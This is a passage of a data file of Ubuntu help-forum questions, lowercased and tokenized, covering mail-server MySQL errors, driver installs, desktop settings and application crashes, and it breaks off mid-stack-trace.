79226	ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 )	i have mailserver configure using dovecot+postfix+mysql and it was runnig fine in the server ( ubuntu server ) . but during last week it stopped working correctly . it does n't send email . when i try to telnet localhost smtp i 'm connecting successfully but when i do mail from : < steve @ example.com > and hit enter it hangs on , nothing happen . having reviewed /var/log/mail.log file i 've found out that probably ( 99 % ) the problem is on postfix when it is trying to connect to mysql server . if you see the log file given below you can see that it says ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) . nov 14 21:54:36 ns1 dovecot : dovecot : killed with signal 15 ( by pid=7731 uid=0 code=kill ) nov 14 21:54:36 ns1 dovecot : dovecot v1.2.9 starting up ( core dumps disabled ) nov 14 21:54:36 ns1 dovecot : auth-worker ( default ) : mysql : connected to localhost ( mailserver ) nov 14 21:54:44 ns1 postfix/postfix-script [ 7753 ] : refreshing the postfix mail system nov 14 21:54:44 ns1 postfix/master [ 1670 ] : reload -- version 2.7.0 , configuration /etc/postfix nov 14 21:54:52 ns1 postfix/trivial-rewrite [ 7759 ] : warning : connect to mysql server localhost : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) nov 14 21:54:52 ns1 postfix/trivial-rewrite [ 7759 ] : fatal : mysql : /etc/postfix/mysql-virtual-alias-maps.cf ( 0 , lock|fold_fix ) : table lookup problem nov 14 21:54:53 ns1 postfix/master [ 1670 ] : warning : process /usr/lib/postfix/trivial-rewrite pid 7759 exit status 1 nov 14 21:54:53 ns1 postfix/cleanup [ 7397 ] : warning : problem talking to service rewrite : connection reset by peer nov 14 21:54:53 ns1 postfix/master [ 1670 ] : warning : /usr/lib/postfix/trivial-rewrite : bad command startup -- throttling nov 14 21:54:53 ns1 postfix/smtpd [ 7071 ] : warning : problem talking to service rewrite : success i tried netstat -ln | grep mysql and it returns unix 2 [ acc ] stream listening 5817 /var/run/mysqld/mysqld.sock . the content of /etc/postfix/mysql-virtual-alias-maps.cf file is here : user = stevejobs password = apple hosts = localhost dbname = mailserver query = select destination from virtual_aliases where source= ' % s' here i tried to change hosts = 127.0.0.1 but it says warning : connect to mysql server 127.0.0.1 : ca n't connect to mysql server on '127.0.0.1 ' ( 110 ) so , i am lost and do n't know where else to change in order to solve the problem . any help would be appreciated highly . thank you . edit 1 when i do netstat -na i see that mysql is not bind neither to localhost nor to 127.0.0.1 . could it be the problem also ? bakhtiyor @ ns1 : ~ $ netstat -na | grep 3306 tcp 0 0 0.0.0.0:3306 0.0.0.0 : * listen
79230	error trying to install the java sdk	i need to install the java 6 sdk , but after running this : sudo apt-get install sun-java6-jdk sun-java6-jre sun-java6-source i end up with this : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : sun-java6-jdk : depends : sun-java6-bin ( > = 6.26-1lucid1 ) but it is not going to be installed sun-java6-jre : depends : sun-java6-bin ( > = 6.26-1lucid1 ) but it is not going to be installed or ia32-sun-java6-bin ( > = 6.26-1lucid1 ) but it is not installable recommends : gsfonts-x11 but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i 'm quite new to ubuntu and need the packages for my course . i guess they 've become corrupted but , how can i fix this ?
79243	intel centrino 1000 not working on an hp dm4t	i 've an hp dm4t laptop with an intel centrino wireless 1000 card . everything was working fine on natty but when i upgraded to oneiric , the wireless ( specifically connectin to wpa2 personal ) stopped working - i would enter the password and it would try to connect but fail . since then , i 've tried everything including a complete reinstall of the system ( along with reformatting the hard drive ) to no avail . oddly enough though , when i run the installation procedure and it asks me to connect to the internet , the wireless works fine . it also does n't seem to be a kernel issue as i installed natty with the newest 3.x kernel and the wireless worked fine . thanks ps - i have only tested with wpa2 since that 's all that i 've available but it 's possible the wireless would work ok with other types of networks .
79246	is there a shorcut to access the last files used ?	is there any shortcut to access the latest files used ?
79247	is it possible to damage tar files during hard power down ?	so in this scenario : i create tar.gz file . with very important files . before i power down computer , electricity goes out . is it safe to files written in tar file will not get corrupted ? is it ok to check just tar file for integrity and not individual files ? how can i check tar.gz file integrity ?
79249	how to get tamedos running on ubuntu	tame dos is a great program which looks like a `` shell '' for dos programs running on windows . so , on windows it works such that applications written for dos start through tamedos , of course . q : how to make that it runs on ubuntu in the same way ? i tell you once again , this is a great program !
79252	is there a window-picker-applet replacement for 11.10 ?	i was very used to the window-picker-applet in previous ubuntu releases and i do n't think i will get used to the new unity dock . is there a window-picker-applet replacement in 11.10 that shows the open windows icons on the panel ? edit : i was looking for som way to only have the top panel and nothing else but i have given up and now i am trying to get used with the unity launcher . one other thing that would be nice is if there where a way to make the launcher smaller than 32 pixels .
79255	directories missing , only the home folder showing ?	in gnome classic , in the places menu , only the home folder is listed , yet the videos , pictures etc folders are actually present in the home older and in the side panel does anyone how to fix this ? thanks in advance
79257	how do i install mysql without a password prompt ?	i 'm trying to install mysql on ubuntu natty without the password prompt . however , i keep getting prompted for a password at some stage after the main installation . also , when i do enter what i believe should be my password ( mymysqlpass ) , it gives me an access denied notice . then when the script terminates , i can login to mysql without a password i.e . mysql -uroot , which should not happen . i 'd appreciate some help in fixing this , below is my code . thanks in advance . # ! /bin/bash # this script installs mysql ( latest build ) # install mysql server mysql_pass=mymysqlpass export debian_frontend=noninteractive debconf-set-selections < < < 'mysql-server-5.1 mysql-server/root_password password ' $ mysql_pass '' debconf-set-selections < < < 'mysql-server-5.1 mysql-server/root_password_again password ' $ mysql_pass '' apt-get -y install mysql-server # configure password and settings for remote access cp /etc/mysql/my.cnf /etc/mysql/my.bak.cnf ip=`ifconfig eth0 | grep `` inet addr '' | cut -d `` : '' -f2 | cut -d `` `` -f1` ; sed -i `` s/\ ( bind-address [ \t ] *\ ) = . */\1= $ ip/ '' /etc/mysql/my.cnf mysql -uroot -e `` update mysql.user set password=password ( ' '' $ mysql_pass '' ' ) where user='root ' ; flush privileges ; '' sleep 10 mysql -uroot -p $ mysql_pass -e `` grant all privileges on * . * to 'root ' @ ' % ' identified by ' '' $ mysql_pass '' ' ; flush privileges ; '' # restart service mysql restart echo `` mysql installation and configuration is complete . ''
79263	how do you install drscheme 5.0.2 ?	i 'm having trouble with drscheme ( or racket ) . i want to install the 5.0.2 version of it and i downloaded a shell script . the problem is that when i open it it does n't do anything . what should i do ?
79265	ubuntu software center is only showing installed apps	i have problem with ubuntu software center in ubuntu 10.10 . i have this but i want usc like here : as you can see i am from russia , and i 'm sorry for my bad english . what should i do to return my ubuntu software center back to normal . ( at first screenshot usc shows me all packeges that installed at my pc . at first screenshot usc shows me only installed apps . )
79270	failing to resume from suspend	i ca n't resume from suspend and i have an idea that zram or prefetch cause this . i have a blinking cursor when trying to resume . i 'd like to try turning zram off , but i was unlucky to find the command using google running dmesg|less i have seen the following lines nautilus [ 2057 ] : segfault at a8 ip 0000000000486d44 sp 00007fff7d448e10 error 4 in nautilus [ 400000+159000 ] running swapon : swapon -s filename type size used priority /dev/sda3 partition 101372 0 -1 /dev/sda5 partition 3906556 0 -2 /dev/zram0 partition 1799092 0 100 /dev/zram1 partition 1799092 0 100
79271	audio volume is maximum but when i play music its not the best maximum level yet compared to fedora , windows xp	how can i maximize the volume to highest++ ? ( i have used alsamixer , pavumeter , etc ) but none of those yet giving me more volume . so to test it . i removed ubuntu and installed first windows xp the same music has very high volume level . because i am not going to use windows xp for that in anyway , i then installed fedora 15/16 , the audio is super max , the same like microsoft xp gave . then i re-installed ubuntu but the audio even with max level its not the maximum yet . still its missing something . so how can i maximize more using commandline or etc etc . i am running : pulseaudio server version : 0.9.22-24-g67d18 ( default shifted by apt-get )
79272	how to change dash transparency ?	depending on the application that is running when i open the dash it is sometimes nearly impossible to read the icons due to the transparency of the dash background . is there a way to change the transparency ?
79273	which wireless keyboards and mice are compatible ?	could i know , what wireless keyboard and mouse work fine with ubuntu for a desktop . last time i installed it on my desktop , my mouse just got froze ! ! then i stopped using it . i really wan na use ubuntu , and i 'm planning to buy this wireless devices . any help in finding the working wireless keyboard and mouse combo , would be appreciated . also i heard most of the logitech devices freeze on ubuntu ! !
79278	`` docked '' -state on thinkpad t410 always 0 in 11.10 x86_64	cat /sys/devices/platform/dock.0/docked and cat /sys/devices/platform/dock.1/docked ist always 0 , whether thinkpad t410 is connected to `` lenovo mini dock series 3 '' or not . i need some way to check whether the thinkpad is docked or not at startup .
79280	how to install chrome browser properly via command line ?	i am trying to install chrome browser via command line . i tried this : $ apt-cache search chrome browser the results show that the proper term is `` chrome-browser , '' so i tried that : $ sudo apt-get install chrome-browser and then `` y '' for the y/n question . but the installation threw errors . does someone see anything wrong with the commands i issued ?
79285	dosbox says the program must be run under win32	i 'm trying to run a dos game in dosbox , but it says it must be run under win32 . the game in question was recently re-released for higher resolution and ability to run under windows . does it mean it 's no longer compatible with dos ? nb if it helps , the game is raptor - call of the shadows 2010 edition .
79290	download manager for ubuntu	is there any good download manager for ubuntu which supports the following ? download online streaming video/audio scheduling grab links from the website integration for chrome ( one click download like idm )
79294	ubuntu unresponsive 'bad sector ' warning in virtual console	i 've had an acer aspire laptop for a little over a year now . for the most part it works great , however once every couple of weeks or so it starts acting up and i need to do a hard re-boot . it 's running ubuntu 11.10 amd64 , but the same situation occurred prior to the update when i was running ubuntu 10.01 x86 . i 'll be running multiple apps for work , web browser , thunderbird , sql monitor , terminal , etc . and a program will crash , basically just stop running and disappear . then when i try to interact with any other programs they are unresponsive or they also crash . when i try to logout or restart from the unity panel it does nothing . when i go into a virtual console to attempt a reboot as the root user i get a laundry list of errors stating 'bad sector ' information . and the prompt to login is presented again . this ultimately leads to me power cycling the box . i 'm wondering if anyone has had this happen to them ? i 've reviewed the hard disk thinking that had something to do with it and the smart tools monitoring does n't indicate that 's the issue . then i started thinking maybe my ram is bad . is there any method of testing the machines ram to verify it is n't corrupt .
79297	can i have two seperate fakeraid disks with two seperate controllers ?	i have a nv and a sil3114 sata controllers , each has a bios setup raid 5 that needs to be shared with windows ... but i cant get either to work after trying what seems like everything . http : //samueltaylor.me.uk/2011/01/31/setting-up-nvidia-nforce-fakeraid-on-ubuntu-10-10/ libata.ignore_hpa=0
79301	wifi signal drops out at random ( apparently ) moments	set up : bt home hub router , two laptops ubuntu 11:10 and other 11:04 and ipod touch . i live in a small rural village in the uk and have had no problems with wifi for many months . in the past 3 days our wifi drops out in that we can `` see '' the ssid from the router but neither of the laptops nor the itouch can access the internet . on all 3 days the drop out has occurred when my neighbour 's father parks his toyota prius ( hybrid with many batteries ) across the road . we can access the internet when connected via ethernet cable . to check the theory our wifi dropped out when he arrived and worked again the minute he left ! i 've spoken to the neighbours and they ( in their own words ) are a non-tech family in that they have an ipad and bt router only and no other technical gadget they use . yesterday i checked to see if the problem was caused by the prius being charged but it was not . as i say because we are in a small community it is relatively easy to ascertain if anything untoward is going on and the only `` change '' that coincides with the wifi drop out is this car arriving . has anyone heard of this issue ? i have `` googled '' this but to no avail . any ideas and help will be gratefully received .
79302	how do i know if my serial adapter card is working ?	i just installed a 2 port serial adapter in my ubuntu 10.10 system , then i tried following this tutorial that i used on my old system to connect to a cisco router ( my old system had an onboard serial adapter , and the tutorial worked just fine ) . i ca n't get my system to connect to the cisco router , so i 'm wondering if the card even works in ubuntu . how can i tell if the card actually works with ubuntu ? # dmesg | grep tty [ 0.000000 ] console [ tty0 ] enabled [ 0.358667 ] serial8250 : ttys0 at i/o 0x3f8 ( irq = 4 ) is a 16550a [ 0.358994 ] 00:0c : ttys0 at i/o 0x3f8 ( irq = 4 ) is a 16550a [ 0.359128 ] ttys1 : detected caps 00000700 should be 00000100 [ 0.359132 ] 0000:03:00.0 : ttys1 at mmio 0xfeafd000 ( irq = 16 ) is a 16c950/954 [ 0.359191 ] ttys2 : detected caps 00000700 should be 00000100 [ 0.359195 ] 0000:03:00.0 : ttys2 at mmio 0xfeafd200 ( irq = 16 ) is a 16c950/954
79305	how do i change my default browser ?	is there an option to change my default browser for all my applications ?
79312	after upgrading from 11.04 to 11.10 , gnome-shell entry in lightdm actually launched unity	i had ubuntu 11.04 installed running gnome 2 . i upgraded to 11.10 and everything went very smoothly . i installed gnome shell via : sudo aptitude install gnome-shell logging into the gnome session from lightdm only launches unity . i tried reinstalling gnome-shell and reconfiguring the gnome-session package to get it to rebuild the lightdm .desktop files to no avail .
79318	how can i switch users from within xfce ?	i am using xubuntu 11.10 . i 'd like to be able to switch users , and i 'd like to be able to do this within the xfce user interface . i read somewhere that there might be an applet i can install , but i can not seem to find it . can someone help ?
79319	possible to change language to a specific application	is it possible to change the language of a particular application that when opened it shows in spanish for example while the rest are in english . i have spanish and english installed in ubuntu and am using english as the default one but i would like a way to change the language for a particular application without having to change the whole language of the system .
79320	how is ubuntu tracking progress towards 200 million users ?	given that ubuntu has a very public goal of reaching 200 million users , how will we know when this goal has been reached ? is a public and transparent method for counting ubuntu users being used ? is there a user count published and updated regularly ? if so , where is it ? we know that goals should be measurable and achievable . leaving aside the question of whether 200 million is achievable , is this goal measurable ?
79321	when is a kernel update due for 11.10 ?	thanks to phoronix there seems to be a fix for the power regression/overheating bug in the linux kernel 3.0.1 bouncing around on the internet . however this supposed fix which i read has been patched to the kernel in a testing phase is not newbie-friendly ( if you know what i mean ) . so i am guessing it will be included in the kernel update for 11.10 . if it will please when is it due ? linked question : kernel patch that solves battery issues when for ubuntu ?
79323	how do you get the very first boot messages smaller ?	how do i get the very first boot messages , before the decryption of the system and before uvesafb is loaded , smaller ? i tried : grub_gfxmode=1024x768 grub_gfxpayload_linux=1024x768 and grub_gfxmode=1024x768x8 grub_gfxpayload_linux=1024x768x8 and grub_cmdline_linux= '' video=vga-1:640x480 '' the same as hex code ( is supported according to sudo hwinfo -- framebuffer ) , in /etc/default/grub and set gfxmode= $ { grub_gfxmode } set gfxpayload=keep load_video insmod gfxterm insmod vbe in /etc/grub.d/00_header . and of course , always sudo-update-grub2 . the letters are still very big . some of the above possibilities even result in a black screen before uvesafb is loaded . version : grub-mkconfig ( grub ) 1.99-12ubuntu5
79325	problem with fresh wubi installation	i 'm new to ubuntu and all the linux stuff . firstly i downloaded a ubuntu11.10 iso and burned it through imgburn ( freeware ) on cd . booted the cd and shortly the ubuntu logo appeared and disappeared after few seconds . there was only a `` _ '' blinking symbol for like 2 minutes and the screen went black . then i tried the other way - wubi installer . after reboot i noticed several lines like `` try hd ( 0,0 ) '' or something like that and at the bottom of it some error with `` fix '' . after 30 seconds it disappeared and the ubuntu setup started . the installation itself went pretty smooth . when the windows boot manager screen came i obviously had chosen ubuntu . same thing appeared like mentioned before with this `` fix '' but it was just a blink . next grub loaded ( it was a purple bootloader for linux i guess ) . i had 3 choices - normal boot , safe boot and the third i ca n't remember . when i chose normal one , the screen went purple and after about 10 seconds it gets totally messed up with black and white lines ! ( graphic card issue ? ) and it wo n't load further . when i tried safe boot the only lines it showed was `` loading linux [ ... ] '' and `` loading initial ramdisk '' and when it came to this point the screen messed up as mentioned before . due to limits i ca n't post the image itself , so i 'm giving the link to imageshack to show what it looks like here . my specs are : - nvidia gtx560ti 1gb , - ep45-ds3l motherboard , - intel e8400 ( c2d @ 3ghz ) , - 4gb ram ddr2 1066 , - dual monitors ( may be an issue ) any help would be appreciated : ) i 'm new to this and i would be glad if someone would explain what 's happening here and how to solve it step by step..
79326	how can install the ubuntu 11.10 `` greybird '' theme on ubuntu 10.04 ?	how can install the ubuntu 11.10 `` greybird '' theme on ubuntu 10.04 ? i ran : sudo apt-get install xubuntu-desktop which allows we to use xfce , but the default `` greybird '' theme found in xubuntu 11.10 ( may be earlier , but that 's when i first saw it ) is not present . is there any way to install this in ubuntu 10.04 ?
79328	reduced battery life in my netbook	i notice my battery is getting empty quickly while using ubuntu 11.10 . when i am using windows 7 with the same power settings and usage , i get a back up of around 3 hours whereas in ubuntu it is half . can you please advise how to increase battery life ?
79331	are there alternatives to libreoffice ?	is there any alternative to libreoffice ? it seems to unfamiliar to ms office users . i found while running certain presentations in .ppt or .pptx it is not fully compatible .
79332	how to start using ktimetracker ?	i installed ktimetracker from sofware center . when i run it trough launcher o writing `` ktimetracker '' in console . it ask me for a icalendar file ( i think so ) , i 've never heard of that type of file , so , i create a empty file with the extension .ics ( i think this is the extension of icalendar files ) and i specified ktimetracker that use that file , but it does n't work . some one knows what i have to do to get ktimetracker work ?
79339	ubuntu , gnome , pam and ecryptfs	i would like to have a directory accessible to a couple of users , and not readable by maintenance types ... i can do what i want using ecryptfs and a password known only to the `` couple of users '' in question , who then can mount the directory and use as they see fit . i would love to be able to automate that process and unlock the directory at login - again , only for the `` couple users '' in question , without asking a password . gnome-keyring is able to store passphrases/passwords encrypted ; and , apparently , if i could get a key identity to ecryptfs , gnome pam modules would allow the key with that identity to be unlocked , and the directory could be mounted . alas , i have found no way to go from point a ( gnome pam keyring module ) to point b ( use the unlocked key in ecryptfs ) . another use of the same mechanism would allow to build a `` key escrow '' mechanism , where keys to encrypted volumes are safekept with , e.g. , hr ; so that company information in encrypted directories can be recovered if you pass under the proverbial bus .
79341	ubuntu - media centre desktop - no digital surround - no blu-ray	i purchased new asus m5a88-m motherboard - 8g ram , 64 bit , 64 g ssd to build xbmc over full desktop ubuntu 64 bit - tried 3 versions of ubuntu between 10 and 11 . system is lightning fast , good in all respects except i can not get the s/pdif to output digital surround to my receiver , and , it does not seem to recognize and be able to play blu-ray movies . i am coming from the windows world - where i have built a few mcpc 's - and thought how nice it would be to do this with ubuntu - i hope this is reasonable , and wanted to get help to make this happen - any ideas ?
79345	can i make epiphany identify itself as another browser ?	i want to use the web browser epiphany as a secondary browser , but windows live mail wo n't let me log in using this web browser . for that reason , i want epiphany to identify itself as another browser , e.g . firefox . is this possible ?
79346	how can i install the realtek rtl8111e version 8168 driver ?	i downloaded and extracted the latest linux driver version from realtek . i read the readme file and it instructed me to run ./autorun.sh as root . i did that . it compiled the driver for my kernel , removed the old default module , but then it fails to install the new 8168 module . it claims that it ca n't be found . can this driver be installed manually ? is there a way to fix autorun.sh so it can install properly ?
79347	what is the policy for updating grub-pc in lts ?	after having attempted an sru request for a small patch to grub-pc for 10.04 lts that fixes an issue that has left many people with unbootable servers nothing has been done for some time . the patch went through d-i into maverick and only modifies a small amount of a single *.c file over a year ago . i updated the ticket with a debdiff of the patch and rebuilt the current grub-pc package plus the patch in a ppa and changed the ticket description to be the sru request format subscribed the `` sru '' and `` sponsors '' teams but then nothing happened . is there some policy against updating grub-pc in lts that i do n't know about ? thanks .
79349	x server startx error ?	root @ thewhitewox : ~ # startx x.org x server 1.7.6 release date : 2010-03-17 x protocol version 11 , revision 0 build operating system : linux 2.6.24-29-server i686 ubuntu current operating system : linux thewhitewox 2.6.18-238.9.1.el5.028stab089.1 # 1 smp thu apr 14 14:06:01 msd 2011 i686 kernel command line : quiet build date : 20 october 2011 03:05:54pm xorg-server 2:1.7.6-2ubuntu7.10 ( for technical support please see ww w.ubuntu . com/support ) current version of pixman : 0.16.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : tue nov 15 00:50:32 2011 ( == ) using config directory : `` /usr/lib/x11/xorg.conf.d '' fatal server error : xf86openconsole : can not open /dev/tty0 ( no such file or directory ) please consult the the x.org foundation support at http : //wiki.x.org for help . please also check the log file at `` /var/log/xorg.0.log '' for additional information . ddxsiggiveup : closing log what does this mean and how can i fix it ?
79359	hib games ( aquaria & penumbra ) can not find libgl.so.1 even though it exists	i 'm trying to play some humble indie bundle ( hib ) games , but i 'm getting errors with aquaria and penumbra : overture that are related to the libgl.so.1 file . aquaria gives this error on launch : message : sdl_gl_loadlibrary error : failed loading libgl.so.1 and penumbra : overture gives this error on launch : ./penumbra.bin : error while loading shared libraries : libgl.so.1 : can not open shared object file : no such file or directory i know that the file libgl.so.1 does exist ( in /usr/lib/x86_64-linux-gnu/mesa/libgl.so.1 ) . from past errors like this , i 'm guessing that you need to symlink the library to another directory , but i ca n't figure out which one .
79363	encrypted home and power failure	if when using an encrypted home ( with ecryptfs ) my system has a power failure is it more likely to cause data loss than it would if it was n't encrypted ? at what extent ? what about a system freeze ?
79367	ubuntu suspend wo n't wake by mouse	i just installed ubuntu 11.10 and realized that suspend would not wake by either keyboard or mouse . after following instructions from here : http : //ubuntuforums.org/showthread.php ? t=1642817 the system will now wake by keyboard . i have a usb mouse it is a logitech g5 . even if i enable all of the usb devices listed in /proc/acpi/wakeup , my computer will still not wake up via mouse . i 'd really prefer to wake by mouse instead of keyboard due to cats . does anyone know why my mouse wo n't wake the machine even after enabling all usb devices listed ?
79386	ca n't install the broadcam sta wireless driver	can somebody help me install the broadcam sta wireless driver ? i 'm new to ubuntu and have been stuck for awhile trying to install the broadcom wireless driver .
79390	what can i do when i receive a 'server-error-not-accepting-jobs ' cups server error in 11.10 ?	i have a richoh aficio-cl3500n that i connected directly to the usb port and it seemed to add and configure itself and populated all fields in 'printer properties ' , but i received the error 'server-error-not-accepting-jobs ' .
79395	how do i restore my clock ?	when i boot ubuntu 10 i got an error message stating that your time applet is not working properly ( and yea that 's true , it is not showing proper time , whereas in windows the time is exact ! ) . i 'm prompted to delete/not-delete the application , i have deleted it . now how i can restore the clock , that will show the correct time ? thanks in advance .
79402	change the default starting directory of nautilus from unity bar	currently nautilus opens the home directory by default . however the command nautilus /path/to/a/directory opens nautilus with the selected directory open . how do i edit the unity bar home folder icon to include path to the directory of my choice ?
79403	ubuntu 11.10 is falling back to unity 2d . how to get back to unity 3d ?	it happened some minutes ago when i plugged my secondary monitor and my graphical interface simply crashed . so i had to restart my session . since the crash ubuntu insists to use unity2d fall back instead of the default one . i used to plug the secondary monitor everyday when at home and nothing bad happened before . this 2d version of the gui is ugly and has a lot of problems . how can i go back to unity 3d gui ? update it seems somehow i lost my opengl support ( driver issues ) . $ glxinfo name of display : :0.0 xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . and : $ glxgears xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't get an rgb , double-buffered visual update $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) how can i revert things and go back to the right driver ?
79406	multiple os in a laptop or desktop	i have installed two operating system in my laptop : ubuntu 11.10 and windows7 . i have never used more than two operating system in a laptop/desktop . i want to install windows8 and my questions are : how many os can be installed in a laptop/desktop ? can i use three operating system ( ubuntu 11.10 , windows7 and windows8 ) simultaneously ? what about performance after installing multiple os ?
79413	chromium disappears from the launcher when minimised	i am using ubuntu 11.10 . when i minimise the chromium browser window , the icon does not appear in the launcher . instead it simply disappears . it had a video running , so i could still hear the audio from it . so where does the window minimise to ? is this a known bug ?
79415	how do i get a ralink rt3060 wireless card to work ?	i 'm currently running ubuntu 11.10 64-bit on my desktop . i got ralink corp rt3060 ( rt3562sta ) wireless device . there was no proper support for this driver for ubuntu on their official site . so i have done some patches to install , which can be found here every hour , i get the following error panic mode occurred , switching back to text console . error screen : http : //i.stack.imgur.com/hvc3a.jpg please help ! i 'm tired of restarting my machine !
79418	installing netcdf	i would like to write a fortran program which uses netcdf . in order to do so , i have to have the netcdf-module somewhere on my harddisc , and tell my compiler where to find it . in synaptic , the following packages are installed : netcdf-bin nco netcdf-doc libnetcdf-dev libnetcdf6 libnetcdf-dev , especially , promises `` everything needed for developing in c , c++ , fortran 77 , and fortran 90 '' ; however , i can not find the libraries anywhere on my system , and accordingly , i can not develop anything . where might the libraries be ? they are neither in /usr/share , nor in /usr/lib . and how , in general , can i found out where a package installs its files on my machine ?
79421	how do i sync music with banshee and my ios 5 device ?	i am a complete noob with ubuntu and well i upgraded my ipod and now i want to sync music with banshee . any way that i could sync music to it ? i tried syncing and ended up messing up the songs . help please ? i have an ipod touch 4th gen with ios 5.0
79434	a human-friendlier samba name mangling	most of our computers run ubuntu , but two of them dual-boot into windows , and when we have guests over , they typically also run windows computers . thus , in addition to using nfs , our file server ( ubuntu server ) also runs samba . and since we use ubuntu mostly , we like to take advantage of its advantages over windows , such as being able to use the characters \ : * ? `` < > | in a file name . the problem , of course , is that windows does n't accept those characters in file names , and so samba has to translate the file name into something more acceptable . the way it does this , however , i find to be obnoxious . the file name episode 182 - exorcist 2 : the heretic.mp4 for instance turns into e4q82r~y.mp4 . this is a terrible `` correction '' . is there a way to make samba 's mangling a little more friendly to humans ? is possible to `` correct '' it to something like episode 182 - exorcist 2_ the heretic.mp4 instead , where the illegal characters are simply substituted ?
79439	how to access dev server in ubuntu virtualbox guest on windows 7 host ?	i 'm running a google app engine dev server on ubuntu 11.10 desktop in a virtualbox vm , on a windows 7 host . according to this question i have the following setup : the vm networking is set to use host-only network adapter . internet connection sharing ( ics ) is enabled in windows . for ics , the windows virtualbox network port and the ubuntu wired connection have fixed ips . the ubuntu vm can access the internet . i can ping the guest from the host . on the host , if i put the guest ip address in chrome 's address bar , it says it can not connect . what do i need to do from here to access the gae dev server that is running on localhost:8080 ?
79444	asking about deleted partition at boot	i have ubuntu installed through wubi . i also had another partition on my computer to try out the dev preview of windows 8 aptly named windows_8 . after i was done playing , i deleted the windows 8 partition and added the extra space back to my win7/wubi partition . now every time i boot into ubuntu , it tells me that it ca n't mount the partition and asks me if i want to recover or skip it . is there a way to get ubuntu to forget about this partition so i can skip this extra step in my boot ?
79450	open link from chrome to firefox ?	i 've got two browsers open , chrome and firefox , and would like to have a shortcut to be able to open a link i have in chrome as a new tab in my firefox window . right now i do this by clicking 'copy link address ' in chrome and pasting the url into firefox , but i would like to have a shortcut defined to do this . is this doable ?
79453	chromium disappears when minimized	i use ubuntu 11.10 . when i use chromium and minimise the window , the window does not appear in the tray . instead it simply disappears , but it had a video running , so i could still hear the audio from it . so where does the window minimise to ? is this a known bug ?
79460	how to change `` inode change time '' of a file ?	i tried to use touch -d `` 2011-09-15 16:50 '' test.txt but it just modifies the last access time and the last modified time . access : 2011-09-15 16:50:00.000000000 +0700 modify : 2011-09-15 16:50:00.000000000 +0700 change : 2011-11-15 16:56:55.620124149 +0700 how to change the last change time ? i want to do this because my crontab use filectime ( $ file ) to get the last changed time , so i need to create a file of two months ago to test something . any help will be appreciated .
79461	tomboy notes not opening - addins not loaded	my tomboy notes is not opening . i tried sudo apt-get remove tomboy sudo apt-get install tomboy still not working when i type tomboy in terminal i get . soma @ ubuntu : ~ $ tomboy ( tomboy:6628 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( tomboy:6628 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( tomboy:6628 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( tomboy:6628 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , [ info 02:13:28.606 ] initializing mono.addins add-in could not be loaded : document element did not appear . file : ///home/soma/.config/tomboy/addin-db-001/config.xml line 1 , position 1 . system.xml.xmlexception : document element did not appear . file : ///home/soma/.config/tomboy/addin-db-001/config.xml line 1 , position 1. at mono.xml2.xmltextreader.read ( ) [ 0x00000 ] in :0 at system.xml.xmltextreader.read ( ) [ 0x00000 ] in :0 at mono.xml.entityresolvingxmlreader.read ( ) [ 0x00000 ] in :0 at mono.xml.dtdvalidatingreader.readcontent ( ) [ 0x00000 ] in :0 at mono.xml.dtdvalidatingreader.read ( ) [ 0x00000 ] in :0 at mono.xml.schema.xsdvalidatingreader.read ( ) [ 0x00000 ] in :0 at system.xml.xmlvalidatingreader.read ( ) [ 0x00000 ] in :0 at system.xml.xmldocument.readnodecore ( system.xml.xmlreader reader ) [ 0x00000 ] in :0 at system.xml.xmldocument.readnode ( system.xml.xmlreader reader ) [ 0x00000 ] in :0 at system.xml.xmldocument.load ( system.xml.xmlreader xmlreader ) [ 0x00000 ] in :0 at system.xml.xmldocument.load ( system.string filename ) [ 0x00000 ] in :0 at mono.addins.database.databaseconfiguration.read ( system.string file ) [ 0x00000 ] in :0 at mono.addins.database.addindatabase.get_configuration ( ) [ 0x00000 ] in :0 at mono.addins.database.addindatabase.isregisteredforuninstall ( system.string domain , system.string addinid ) [ 0x00000 ] in :0 at mono.addins.addinregistry.isregisteredforuninstall ( system.string addinid ) [ 0x00000 ] in :0 at mono.addins.addinregistry.getaddin ( system.string id ) [ 0x00000 ] in :0 at mono.addins.addinengine.resolveloaddependencies ( system.collections.arraylist addins , system.collections.stack depcheck , system.string id , boolean optional ) [ 0x00000 ] in :0 at mono.addins.addinengine.loadaddin ( iprogressstatus statusmonitor , system.string id , boolean throwexceptions ) [ 0x00000 ] in :0 exception in gtk # callback delegate note : applications can use glib.exceptionmanager.unhandledexception to handle the exception . system.xml.xmlexception : document element did not appear . file : ///home/soma/.config/tomboy/addin-db-001/config.xml line 1 , position 1. at mono.xml2.xmltextreader.read ( ) [ 0x00000 ] in :0 at system.xml.xmltextreader.read ( ) [ 0x00000 ] in :0 at mono.xml.entityresolvingxmlreader.read ( ) [ 0x00000 ] in :0 at mono.xml.dtdvalidatingreader.readcontent ( ) [ 0x00000 ] in :0 at 